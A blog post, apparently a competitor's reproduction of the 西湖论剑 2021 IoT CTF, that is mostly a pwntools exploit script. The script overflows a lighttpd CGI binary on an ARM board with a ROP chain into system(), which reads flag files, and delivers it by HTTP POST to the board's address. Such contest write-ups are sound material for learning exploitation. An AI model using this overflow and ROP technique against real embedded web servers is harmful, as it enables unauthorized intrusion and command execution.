
西湖论剑 2021 IOT Writeup / Reproduction

March 16, 2022 • Pwn, CTF

We took third place in this contest, sob. Long-ge did all the output; right before the contest ended we solved one single-device IOT challenge (单点 IOT). Personally I think the main problem was not being familiar enough with the board: just connecting to the board ate up a huge amount of time and energy, and by the time the contest ended we still had not gotten a shell on the board.

Because of the COVID outbreak in Xiaoshan, Hangzhou, I cannot return to school and have to quarantine at home for 14 days, so I am taking the opportunity to play with this board and reproduce the contest challenges, hoping to do better next year.

The challenge files and the official writeup are at https://github.com/DasSecurity-HatLab/IoT-CTF-2021
I have been preparing some things for 虎符 PKS these days, so this part may be updated a bit later.

Writeup

lighttpd

from pwn import *
# from Crypto.Util.number import long_to_bytes  # only needed by the leak-parsing code at the bottom
# context.log_level = "debug"
context.binary = "./55.cgi"  # non-PIE ARM CGI binary; all addresses below are absolute

# Addresses in 55.cgi collected during analysis. Only add_sp and system_addr
# are used by the final chain; the rest are leftovers from earlier attempts.
exit_addr = 0x00010D14
add_sp = 0x000108b8  # "add sp" epilogue gadget; the overwritten return address points here
bss_addr = 0x00022088
puts_addr = 0x00010708
fread_addr = 0x000106F0
pop_r3_addr = 0x0001066c
mov_r0_r7 = 0x00010ec4
pop_fp_addr = 0x00010998
system_addr = 0x10720
show_leak_addr = 0x00010D0C

# Register file consumed by the gadget's pop {r4-r8, pc}:
# r7 points into .bss and pc goes to system.
ROP_chain = [
    0,            # r4
    0,            # r5
    0,            # r6
    bss_addr,     # r7
    0,            # r8
    system_addr,  # pc
]
print(hex(len(flat(ROP_chain))))  # 0x18

# POST body: magic prefix, five 0xFF bytes, padding up to 0x200, then the chain
query = b"*#$^" + b"\xFF" * 3 + b"\xFF\xFF"
query = query.ljust(0x200, b"x")
query += flat(ROP_chain).ljust(0x9E, b"p")
# query = query.ljust(0x2FD - 0x4D, b"a")

# Command to run; padded to exactly 0x2f4 bytes
x = b"cat /ro*/*;"
x += b"a" * (0x2f4 - len(x))
x = x[:0x2f4]
# filler, command, one saved-register slot, then the overwritten return address
query += b"b" * 0x12 + x + b"c" * 4 + p32(add_sp)

DEBUG = 0
if DEBUG:
    # Run the CGI under user-mode qemu with a gdb stub on :1234.
    # lighttpd normally derives these variables from the HTTP request.
    env = {
        "HTTP_COOKIES": "[email protected]!!!",  # cookie value as it appears in the published script
        "REQUEST_METHOD": "POST",
        "CONTENT_TYPE": "application/x-www-form-urlencoded",
        "CONTENT_LENGTH": str(len(query)),
    }
    sh = process(["qemu-arm", "-g", "1234", "-L", "/usr/arm-linux-gnueabi/", "55.cgi"], env=env)
    sh.send(query)
    sh.interactive()
else:
    # Deliver the same body through lighttpd on the board
    sh = remote("114.5.32.22", 80)
    headers = (
        "POST /cgi-bin/55.cgi HTTP/1.1\r\n"
        "Host: 114.5.32.22\r\n"
        "Cookies: [email protected]!!!\r\n"
        "Content-Length: {}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "\r\n"
    ).format(len(query))
    sh.send(headers.encode() + query)
    sh.interactive()

# Earlier attempts, kept for reference:
# payload = p32(exit_addr) * 0xEE + p32(show_leak_addr)
# query = b"*#$^" + b"\xFF" * 3 + b"\xFF" + b"\xF7"
# filp_size = 0x2FD + 4 - 0x4D - len(payload)
# all_data = (b"a" * 5 + p32(show_leak_addr) * ((filp_size // 4) - 3)).ljust(0x2FD - 0x4D - 5, b"a")
#
# Reading a leaked value back out of the response:
# sh.recvuntil(b"\r\n\r\n")
# data = sh.recvuntil(b"No Authentication", drop=True)
# print(long_to_bytes(int(data, 16))[::-1])
# sh.interactive()

On-site photos: 03110055_w8348.jpg, 0D9A0648_w3446.jpg, 0D9A1292_w5950.jpg (images not included here)

Last Modified: March 23, 2022

1 comment so far
  1. 王师傅 is too strong